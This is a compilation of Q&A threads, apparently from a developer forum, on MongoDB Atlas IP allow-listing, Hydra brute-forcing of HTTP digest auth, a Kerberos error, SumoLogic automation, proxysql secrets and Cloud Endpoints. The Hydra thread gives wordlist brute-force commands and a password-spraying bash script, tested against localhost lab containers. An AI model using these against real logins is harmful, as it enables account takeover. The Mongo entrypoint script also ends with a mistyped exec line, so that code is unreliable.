MongoDB Atlas: is it safe to whitelist all IPs because someone attempting to access the database needs a password?

I have a Google App Engine app running my Express server. I also have my DB in MongoDB Atlas. I currently have MongoDB Atlas whitelisting all IPs. The connection string is in the code for my Express server running on Google Cloud. Presumably any attacker trying to get into the database would still need a username and password for the connection string.
Is it safe to do this?
If it's not safe, then how do I whitelist my google app engine on Mongo Atlas?

Is it safe to do this?
"Safe" is a relative term. It is safer than having an unauthed database open to the internet, but the weakest link is now your password.
A whitelist is an additional layer of security, so that if someone knows or can guess your password, they can't just connect from anywhere; they must be connecting from a set of known IP addresses. This makes the attack surface smaller, so the database is less likely to be broken into by a random person on the internet.
If it's not safe, then how do I whitelist my google app engine on Mongo Atlas?
You would need to determine the IP range(s) of your application and add that range to the whitelist.
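If you prefer to manage the entries programmatically instead of through the UI, the Atlas project IP access list API can be used. A minimal sketch (the API key variables, project ID and CIDR below are placeholders you would substitute):
# add a CIDR block to the project IP access list (Atlas v1.0 API, HTTP digest auth)
curl -s --user "$MONGO_ATLAS_API_PK:$MONGO_ATLAS_API_SK" --digest \
  --header "Content-Type: application/json" \
  --request POST \
  "https://cloud.mongodb.com/api/atlas/v1.0/groups/$MONGO_ATLAS_API_PROJECT_ID/accessList" \
  --data '[{ "cidrBlock": "203.0.113.0/24", "comment": "app egress range" }]'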

here is an answer i left elsewhere. hope it helps someone who comes across this:
this script will be kept up to date on my gist
why
mongo atlas provides reasonably priced access to a managed mongo DB. CSPs where containers are hosted charge too much for their managed mongo DB. they all suggest setting an insecure CIDR (0.0.0.0/0) to allow the container to access the cluster. this is obviously ridiculous.
this entrypoint script is surgical, to maintain least-privilege access: only the current hosted IP address of the service is whitelisted.
usage
set as the entrypoint for the Dockerfile
run in cloud init / VM startup if not using a container (and delete the last line exec "$@" since that is just for containers)
behavior
uses the mongo atlas project IP access list endpoints
will detect the hosted IP address of the container and whitelist it with the cluster using the mongo atlas API
if the service has no whitelist entry it is created
if the service has an existing whitelist entry that matches current IP no change
if the service IP has changed the old entry is deleted and new one is created
when a whitelist entry is created the service sleeps for 60s to wait for atlas to propagate access to the cluster
env
setup
1. create API key for org
2. add API key to project
3. copy the public key (MONGO_ATLAS_API_PK) and secret key (MONGO_ATLAS_API_SK)
4. go to project settings page and copy the project ID (MONGO_ATLAS_API_PROJECT_ID)
provide the following values in the env of the container service
SERVICE_NAME: unique name used for creating / updating (deleting old) whitelist entry
MONGO_ATLAS_API_PK: step 3
MONGO_ATLAS_API_SK: step 3
MONGO_ATLAS_API_PROJECT_ID: step 4
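for example, a hedged sketch of passing these at runtime with plain docker run (image name and values are hypothetical):
docker run -d \
  -e SERVICE_NAME="my-api" \
  -e MONGO_ATLAS_API_PK="xxxx" \
  -e MONGO_ATLAS_API_SK="xxxx" \
  -e MONGO_ATLAS_API_PROJECT_ID="xxxx" \
  my-api-image:latest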
deps
bash
curl
jq CLI JSON parser
# alpine / apk
apk update \
&& apk add --no-cache \
bash \
curl \
jq
# ubuntu / apt
export DEBIAN_FRONTEND=noninteractive \
&& apt-get update \
&& apt-get -y install \
bash \
curl \
jq
script
#!/usr/bin/env bash
# -- ENV -- #
# these must be available to the container service at runtime
#
# SERVICE_NAME
#
# MONGO_ATLAS_API_PK
# MONGO_ATLAS_API_SK
# MONGO_ATLAS_API_PROJECT_ID
#
# -- ENV -- #
set -e
mongo_api_base_url='https://cloud.mongodb.com/api/atlas/v1.0'
check_for_deps() {
deps=(
bash
curl
jq
)
for dep in "${deps[@]}"; do
if [ ! "$(command -v $dep)" ]
then
echo "dependency [$dep] not found. exiting"
exit 1
fi
done
}
make_mongo_api_request() {
local request_method="$1"
local request_url="$2"
local data="$3"
curl -s \
--user "$MONGO_ATLAS_API_PK:$MONGO_ATLAS_API_SK" --digest \
--header "Accept: application/json" \
--header "Content-Type: application/json" \
--request "$request_method" "$request_url" \
--data "$data"
}
get_access_list_endpoint() {
echo -n "$mongo_api_base_url/groups/$MONGO_ATLAS_API_PROJECT_ID/accessList"
}
get_service_ip() {
echo -n "$(curl https://ipinfo.io/ip -s)"
}
get_previous_service_ip() {
local access_list_endpoint=`get_access_list_endpoint`
local previous_ip=`make_mongo_api_request 'GET' "$access_list_endpoint" \
| jq --arg SERVICE_NAME "$SERVICE_NAME" -r \
'.results[]? as $results | $results.comment | if test("\\[\($SERVICE_NAME)\\]") then $results.ipAddress else empty end'`
echo "$previous_ip"
}
whitelist_service_ip() {
local current_service_ip="$1"
local comment="Hosted IP of [$SERVICE_NAME] [set#$(date +%s)]"
if (( "${#comment}" > 80 )); then
echo "comment field value will be above 80 char limit: \"$comment\""
echo "comment would be too long due to length of service name [$SERVICE_NAME] [${#SERVICE_NAME}]"
echo "change comment format or service name then retry. exiting to avoid mongo API failure"
exit 1
fi
echo "whitelisting service IP [$current_service_ip] with comment value: \"$comment\""
response=`make_mongo_api_request \
'POST' \
"$(get_access_list_endpoint)?pretty=true" \
"[
{
\"comment\" : \"$comment\",
\"ipAddress\": \"$current_service_ip\"
}
]" \
| jq -r 'if .error then . else empty end'`
if [[ -n "$response" ]];
then
echo 'API error whitelisting service'
echo "$response"
exit 1
else
echo "whitelist request successful"
echo "waiting 60s for whitelist to propagate to cluster"
sleep 60s
fi
}
delete_previous_service_ip() {
local previous_service_ip="$1"
echo "deleting previous service IP address of [$SERVICE_NAME]"
make_mongo_api_request \
'DELETE' \
"$(get_access_list_endpoint)/$previous_service_ip"
}
set_mongo_whitelist_for_service_ip() {
local current_service_ip=`get_service_ip`
local previous_service_ip=`get_previous_service_ip`
if [[ -z "$previous_service_ip" ]]; then
echo "service [$SERVICE_NAME] has not yet been whitelisted"
whitelist_service_ip "$current_service_ip"
elif [[ "$current_service_ip" == "$previous_service_ip" ]]; then
echo "service [$SERVICE_NAME] IP has not changed"
else
echo "service [$SERVICE_NAME] IP has changed from [$previous_service_ip] to [$current_service_ip]"
delete_previous_service_ip "$previous_service_ip"
whitelist_service_ip "$current_service_ip"
fi
}
check_for_deps
set_mongo_whitelist_for_service_ip
# run CMD
exec "$#"

Related

Brute forcing http digest with Hydra

I am having some trouble brute forcing an HTTP digest form with Hydra. I am using the following command; however, when proxied through Burp Suite I can see Hydra is using basic auth and not digest.
How do I get Hydra to use the proper auth type?
Command:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -vV http-get /digest
Request as seen in proxy:
GET /digest HTTP/1.1
Host: 127.0.0.1
Connection: close
Authorization: Basic YWRtaW46aWxvdmV5b3U=
User-Agent: Mozilla/4.0 (Hydra)
I have studied this case: if the digest method is implemented at the Nginx or Apache server level, Hydra might work. But if the authentication is implemented in the application framework, like Flask, Express.js or Django, it will not work at all.
You can create a bash script for password spraying:
#!/bin/bash
# usage: ./app.sh <users file> <passwords file> <url>
while read -r USER; do
  while read -r PASSWORD; do
    if curl -s "$3" -c /tmp/cookie --digest -u "$USER:$PASSWORD" | grep -qi "unauth"
    then
      continue
    else
      echo "[+] Found $USER:$PASSWORD"
      exit 0
    fi
  done < "$2"
done < "$1"
Save this file as app.sh
$ chmod +x app.sh
$ ./app.sh /path/to/users.txt /path/to/passwords.txt http://example.com/path
Since no Hydra version was specified, I assume the latest one: 9.2.
@tbhaxor is correct:
Against a server like Apache or nginx, Hydra works. Flask using digest authentication as recommended in the standard documentation does not work (details later). You could add the web server you used so somebody can verify this.
Hydra does not provide explicit parameters to distinguish between basic and digest authentication.
Technically, it first sends a request that attempts to authenticate itself via basic authentication. After that it evaluates the corresponding response.
The specification of digest authentication states that the web application has to send a WWW-Authenticate: Digest ... header in the response if the requested document is protected using the scheme.
So Hydra now can distinguish between the two forms of authentication.
If it receives this response (cf. code), it sends a second attempt using digest authentication.
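For illustration, the 401 response that triggers the switch looks roughly like this (the realm, nonce and opaque values are made up):
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Digest realm="this is not for you", qop="auth", nonce="dcd98b7102dd2f0e8b11d0f600bfb0c0", opaque="5ccc069c403ebaf9f0171e9517f40e41"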
The reason why you can only see basic auth and not digest requests is due to the default setting of what Hydra calls "tasks". This is set to 16 by default, which means it initially creates 16 threads.
Thus, if you go to the 17th request in your proxy you will find a request using digest auth. You can also see the difference if you set the number of tasks to 1 with the parameter -t 1.
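For example, based on the command from the question, a single task makes the basic-then-digest sequence easy to follow in the proxy:
hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -vV http-get /digest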
The following are 3 Docker setups where you can test the differences between basic auth (nginx), digest auth (nginx) and digest auth (Flask) using "admin/password" credentials, based upon your example:
basic auth:
cat Dockerfile.http_basic_auth
FROM nginx:1.21.3
LABEL maintainer="secf00tprint"
RUN apt-get update && apt-get install -y apache2-utils
RUN touch /usr/share/nginx/html/.htpasswd
RUN htpasswd -db /usr/share/nginx/html/.htpasswd admin password
RUN sed -i '/^ location \/ {/a \ auth_basic "Administrator\x27s Area";\n\ auth_basic_user_file /usr/share/nginx/html/.htpasswd;' /etc/nginx/conf.d/default.conf
:
sudo docker build -f Dockerfile.http_basic_auth -t http-server-basic-auth .
sudo docker run -ti -p 127.0.0.1:8888:80 http-server-basic-auth
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (nginx):
cat Dockerfile.http_digest
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update && \
# For digest module
DEBIAN_FRONTEND=noninteractive apt-get install -y curl unzip \
# For nginx
build-essential libpcre3 libpcre3-dev zlib1g zlib1g-dev libssl-dev libgd-dev libxml2 libxml2-dev uuid-dev make apache2-utils expect
RUN curl -O https://nginx.org/download/nginx-1.21.3.tar.gz
RUN curl -OL https://github.com/atomx/nginx-http-auth-digest/archive/refs/tags/v1.0.0.zip
RUN tar -xvzf nginx-1.21.3.tar.gz
RUN unzip v1.0.0.zip
RUN cd nginx-1.21.3 && \
./configure --prefix=/usr/share/nginx --sbin-path=/usr/sbin/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/etc/nginx/modules --add-module=../nginx-http-auth-digest-1.0.0/ && \
make && make install
COPY generate.exp /usr/share/nginx/html/
RUN chmod u+x /usr/share/nginx/html/generate.exp && \
cd /usr/share/nginx/html/ && \
expect -d generate.exp
RUN sed -i '/^ location \/ {/a \ auth_digest "this is not for you";' /etc/nginx/nginx.conf
RUN sed -i '/^ location \/ {/i \ auth_digest_user_file /usr/share/nginx/html/passwd.digest;' /etc/nginx/nginx.conf
CMD nginx && tail -f /var/log/nginx/access.log -f /var/log/nginx/error.log
:
cat generate.exp
#!/usr/bin/expect
set timeout 70
spawn "/usr/bin/htdigest" "-c" "passwd.digest" "this is not for you" "admin"
expect "New password: " {send "password\r"}
expect "Re-type new password: " {send "password\r"}
wait
:
sudo docker build -f Dockerfile.http_digest -t http_digest .
sudo docker run -ti -p 127.0.0.1:8888:80 http_digest
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 8888 http-get /
digest auth (Flask):
cat Dockerfile.http_digest_flask
FROM ubuntu:20.10
LABEL maintainer="secf00tprint"
RUN apt-get update -y && \
apt-get install -y python3-pip python3-dev
# We copy just the requirements.txt first to leverage Docker cache
COPY ./requirements.txt /app/requirements.txt
WORKDIR /app
RUN pip3 install -r requirements.txt
COPY ./app.py /app/
CMD ["flask", "run", "--host=0.0.0.0"]
:
cat requirements.txt
Flask==2.0.2
Flask-HTTPAuth==4.5.0
:
cat app.py
from flask import Flask
from flask_httpauth import HTTPDigestAuth
app = Flask(__name__)
app.secret_key = 'super secret key'
auth = HTTPDigestAuth()
users = {
"admin" : "password",
"john" : "hello",
"susan" : "bye"
}
@auth.get_password
def get_pw(username):
if username in users:
return users.get(username)
return None
@app.route("/")
@auth.login_required
def hello_world():
return "<p>Flask Digest Demo</p>"
:
sudo docker build -f Dockerfile.http_digest_flask -t digest_flask .
sudo docker run -ti -p 127.0.0.1:5000:5000 digest_flask
:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 -s 5000 http-get /
If you want to see more information I wrote about it in more detail here.

gss_accept_sec_context() error:ASN.1 structure is missing a required field

I'm trying to implement Kerberos authentication on Ubuntu.
run_kerberos_server.sh
#!/usr/bin/env bash
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
docker stop krb5-server && docker rm krb5-server && true
docker run -d --network=altexy --name krb5-server \
-e KRB5_REALM=EXAMPLE.COM -e KRB5_KDC=localhost -e KRB5_PASS=12345 \
-v /etc/localtime:/etc/localtime:ro \
-v /etc/timezone:/etc/timezone:ro \
--network-alias example.com \
-p 88:88 -p 464:464 -p 749:749 gcavalcante8808/krb5-server
echo "=== Init krb5-server docker container ==="
docker exec krb5-server /bin/sh -c "
# Create users bob as normal user
# and add principal for the service
cat << EOF | kadmin.local
add_principal -randkey \"HTTP/service.example.com@EXAMPLE.COM\"
ktadd -k /etc/krb5-service.keytab -norandkey \"HTTP/service.example.com@EXAMPLE.COM\"
ktadd -k /etc/admin.keytab -norandkey \"admin/admin@EXAMPLE.COM\"
listprincs
quit
EOF
"
echo "=== Copy keytabs ==="
docker cp krb5-server:/etc/krb5-service.keytab "${DIR}"/krb5-service.keytab
docker cp krb5-server:/etc/admin.keytab "${DIR}"/admin.keytab
Get Kerberos ticket:
alex@alex-secfense:~/projects/proxy-auth/etc/kerberos$ kinit admin/admin@EXAMPLE.COM
Password for admin/admin@EXAMPLE.COM:
alex@alex-secfense:~/projects/proxy-auth/etc/kerberos$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: admin/admin@EXAMPLE.COM
Valid starting       Expires              Service principal
16.12.2020 12:05:38  17.12.2020 00:05:38  krbtgt/EXAMPLE.COM@EXAMPLE.COM
        renew until 17.12.2020 12:05:35
Then I start nginx, also in Docker container, image is derived from openresty/openresty:xenial.
My /etc/hosts file has 127.0.0.1 service.example.com line.
My Firefox is configured for network.negotiate-auth.trusted-uris = service.example.com
I open the service.example.com:<mapped_port> page in Firefox, nginx responds with 401, and Firefox sends an Authorization: Negotiate ... header.
My server side code (error and result handling is stripped):
MYAPI int authenticate(const char* token, size_t length)
{
gss_buffer_desc service = GSS_C_EMPTY_BUFFER;
gss_name_t my_gss_name = GSS_C_NO_NAME;
gss_cred_id_t my_gss_creds = GSS_C_NO_CREDENTIAL;
OM_uint32 minor_status;
OM_uint32 major_status;
gss_ctx_id_t gss_context = GSS_C_NO_CONTEXT;
gss_name_t client_name = GSS_C_NO_NAME;
gss_buffer_desc output_token = GSS_C_EMPTY_BUFFER;
gss_buffer_desc input_token = GSS_C_EMPTY_BUFFER;
input_token.length = length;
input_token.value = (void*)token;
major_status = gss_accept_sec_context(&minor_status, &gss_context, my_gss_creds, &input_token,
GSS_C_NO_CHANNEL_BINDINGS, &client_name, NULL, &output_token, NULL, NULL, NULL);
return 0;
}
Eventually, I get a gss_accept_sec_context() error: ASN.1 structure is missing a required field.
The same code works great with Windows Kerberos setup.
Any idea what does it mean or how to debug the issue?
I did define the KRB5_TRACE=/<log_file_name> environment variable and see lines like the ones below:
[7] 1607798057.341744: Sending request (937 bytes) to EXAMPLE.COM
[6] 1608109670.292389: Sending request (937 bytes) to EXAMPLE.COM
[6] 1608109670.660887: Sending request (937 bytes) to EXAMPLE.COM
May it be a DNS issue?
UPDATE: I missed that I specify the keytab file to use on the server side before calling gss_accept_sec_context (again, error handling is stripped out):
OM_uint32 major_status = gsskrb5_register_acceptor_identity(keytab_filename)
Your code breaks the fundamental concept of context completion. It violates RFC 7546 and is not trustworthy, plus you completely ignore the major/minor status codes. Now, your tokens get modified somehow in flight, because the ASN.1 encoding is broken.
Dump token before and after transmission and compare.
Start with gss-server and gss-client first.
Read their code and implement yours alike. Do not deviate from the imperative of the context loop completion.
Show the ticket cache after Firefox has obtained a service ticket.
As soon as you have the tokens, inspect them with https://lapo.it/asn1js/.
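A hedged sketch of dumping a captured token for inspection (it assumes you copied the base64 value from the Authorization: Negotiate header into token.b64):
# decode the Negotiate token and dump its DER/ASN.1 structure
base64 -d token.b64 > token.bin
openssl asn1parse -inform DER -in token.bin | head -n 20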

SumoLogic dashboards - how do I automate?

I am getting some experience with SumoLogic dashboards and alerting. I would like to have all possible configuration in code. Does anyone have experience with automation of SumoLogic configuration? At the moment I am using Ansible for general server and infra provisioning.
Thanks for all info!
Best Regards,
Rafal.
(The dashboards, alerts, etc. are referred to as Content in Sumo Logic parlance)
You can use the Content Management API, especially the content-import-job. I am not an expert in Ansible, but I am not aware of any way to plug that API into Ansible.
Also there's a community Terraform provider for Sumo Logic and it supports content:
resource "sumologic_content" "test" {
parent_id = "%s"
config =
{
"type": "SavedSearchWithScheduleSyncDefinition",
"name": "test-333",
"search": {
"queryText": "\"warn\"",
"defaultTimeRange": "-15m",
[...]
Disclaimer: I am currently employed by Sumo Logic
Below is a shell script to import the dashboards. Here it uses the Sumo Logic AU instance, e.g. https://api.au.sumologic.com/api; this will change based on your region.
Note: you can export all of your dashboards as JSON files.
#!/usr/bin/env bash
set -e
# if you are using AWS parameter store
# accessKey=$(aws ssm get-parameter --name path_to_your_key --with-decryption --query 'Parameter.Value' --region=ap-southeast-2 | tr -d \")
# accessSecret=$(aws ssm get-parameter --name path_to_your_secret --with-decryption --query 'Parameter.Value' --region=ap-southeast-2 | tr -d \")
# yourDashboardFolderName="xxxxx" # this is the folder id in the sumologic where you want to create dashboards
# if you are using just key and secret
accessKey="your_sumologic_key"
accessSecret="your_sumologic_secret"
yourDashboardFolderName="xxxxx" # this is the folder id in the sumologic
# you can place all the json files of dashboard in ./Sumologic/Dashboards folder.
for f in $(find ./Sumologic/Dashboards -name '*.json'); \
do \
curl -X POST https://api.au.sumologic.com/api/v2/content/folders/$yourDashboardFolderName/import \
-H "Content-Type: application/json" \
-u "$accessKey:$accessSecret" \
-d @$f \
;done

proxysql: inject secrets into proxysql.cnf

I have a few proxysql (https://proxysql.com/) instances (running in Kubernetes). However, I don't want to hardcode the db credentials in the config file (proxysql.cnf). I was hoping I could use ENV variables but I wasn't able to get that to work. What is the proper way to include secrets in a proxysql instance without hard coding passwords in plain text files?
I was thinking of including the config file as one secret and mounting it in Kubernetes (seems like overkill or wrong), or running envsubst in a startup script or init container.
Thoughts?
What I ended up doing was running a sidecar with an init script as a ConfigMap:
#!/bin/sh
echo "Check if mysqld is running..."
while ! nc -z 127.0.0.1 6032; do
sleep 0.1
done
echo "mysql is running!"
echo "Loading Runtime Data..."
echo "INSERT INTO mysql_users(username,password,default_hostgroup) VALUES ('$USERNAME','$PASSWORD',1);" | mysql -u $PROXYSQL_USER -p$PROXYSQL_PASSWORD -h 127.0.0.1 -P6032
echo "LOAD MYSQL USERS TO RUNTIME;" | mysql -u $PROXYSQL_USER -p$PROXYSQL_PASSWORD -h 127.0.0.1 -P6032
echo "Runtime Data loaded."
while true; do sleep 300; done;
Seems to work nicely.
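For comparison, the envsubst idea from the question could look roughly like this as a startup script (a hedged sketch; the template path and variable names are made up, and it assumes an alpine-based image):
#!/bin/sh
# render proxysql.cnf from a template, substituting only the credential variables
apk add --no-cache gettext   # provides envsubst
envsubst '$MONITOR_USER $MONITOR_PASSWORD' \
  < /etc/proxysql/proxysql.cnf.tpl \
  > /etc/proxysql/proxysql.cnf
exec proxysql -f -c /etc/proxysql/proxysql.cnf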

Google Cloud Endpoint Error when creating service config

I am trying to configure Google Cloud Endpoints using Cloud Functions. For the same I am following instructions from: https://cloud.google.com/endpoints/docs/openapi/get-started-cloud-functions
I have followed the steps given and have come to the point of building the service config into a new ESPv2 Beta docker image. When I give the command:
chmod +x gcloud_build_image
./gcloud_build_image -s CLOUD_RUN_HOSTNAME \
-c CONFIG_ID -p ESP_PROJECT_ID
after replacing the hostname, config ID and project ID, I get the following error:
> -c service-host-name-xxx -p project-id
Using base image: gcr.io/endpoints-release/endpoints-runtime-serverless:2
++ mktemp -d /tmp/docker.XXXX
+ cd /tmp/docker.5l3t
+ gcloud endpoints configs describe service-host-name-xxx.run.app --project=project-id --service=service-host-name-xxx.app --format=json
ERROR: (gcloud.endpoints.configs.describe) NOT_FOUND: Service configuration 'services/service-host-name-xxx.run.app/configs/service-host-name-xxx' not found.
+ error_exit 'Failed to download service config'
+ echo './gcloud_build_image: line 46: Failed to download service config (exit 1)'
./gcloud_build_image: line 46: Failed to download service config (exit 1)
+ exit 1
Any idea what I am doing wrong? Thanks.
My bad. I repeated the steps and got it working. So I guess there must have been some mistake I made while trying it out. The document works as it states.
I had the same error. When running the script twice it works. This means you have to already have a service endpoint configured, which does not exist yet when the script tries to fetch the endpoint information with:
gcloud endpoints configs describe service-host-name-xxx.run.app
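One way to confirm whether the service and a config already exist before the script runs (the placeholders are taken from the question):
gcloud endpoints services list --project=project-id
gcloud endpoints configs list --service=service-host-name-xxx.run.app --project=project-id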
What I would do (in cloudbuild) is to supply some sort of an "empty" container first. I used the following example on top of my cloudbuild.yaml:
gcloud run services list \
--platform managed \
--project ${PROJECT_ID} \
--region europe-west1 \
--filter=${PROJECT_ID}-esp-svc \
--format yaml | grep . ||
gcloud run deploy ${PROJECT_ID}-esp-svc \
--image="gcr.io/endpoints-release/endpoints-runtime-serverless:2" \
--allow-unauthenticated \
--platform managed \
--project=${PROJECT_ID} \
--region=europe-west1 \
--timeout=120